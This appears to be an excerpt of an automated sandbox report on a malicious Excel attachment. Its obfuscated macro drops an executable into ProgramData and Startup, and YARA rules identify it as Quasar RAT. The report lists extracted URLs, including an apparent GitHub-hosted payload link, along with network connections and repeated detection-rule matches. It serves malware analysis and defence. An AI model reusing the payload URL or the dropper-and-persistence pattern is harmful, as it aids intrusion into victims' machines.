Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp	String found in binary or memory: https://raw.githubusercontent.com4
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://tasks.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Show sources

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

Initial sample: High usage of CHAR() function: 23

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\a.exe			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe			Jump to dropped file

Source: C:\ProgramData\a.exe	Code function: 1_2_00E6C154	1_2_00E6C154
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6E597	1_2_00E6E597
Source: C:\ProgramData\a.exe	Code function: 1_2_00E6E598	1_2_00E6E598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAC154	11_2_00FAC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAE598	11_2_00FAE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 11_2_00FAE589	11_2_00FAE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD579D	13_2_02BD579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD0740	13_2_02BD0740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16A8	13_2_02BD16A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16FC	13_2_02BD16FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD16E7	13_2_02BD16E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD17B2	13_2_02BD17B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD178B	13_2_02BD178B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD0730	13_2_02BD0730
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD172C	13_2_02BD172C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD170F	13_2_02BD170F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD1773	13_2_02BD1773
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD175A	13_2_02BD175A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD1741	13_2_02BD1741
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD04D8	13_2_02BD04D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD04C9	13_2_02BD04C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BD3F7D	13_2_02BD3F7D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054121F8	13_2_054121F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054152E8	13_2_054152E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_05411928	13_2_05411928
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541A710	13_2_0541A710
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0541A6FF	13_2_0541A6FF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_054115E0	13_2_054115E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_0690BFD6	13_2_0690BFD6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06907994	13_2_06907994
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E04F4F	13_2_06E04F4F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E03F58	13_2_06E03F58
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_06E01B88	13_2_06E01B88
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 13_2_02BDD250	13_2_02BDD250
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DC154	17_2_028DC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DE589	17_2_028DE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 17_2_028DE598	17_2_028DE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_01560740	20_2_01560740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_0156579D	20_2_0156579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_015604D8	20_2_015604D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_015604C9	20_2_015604C9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Code function: 20_2_01560730	20_2_01560730

Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls

OLE indicator, VBA macros: true

Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
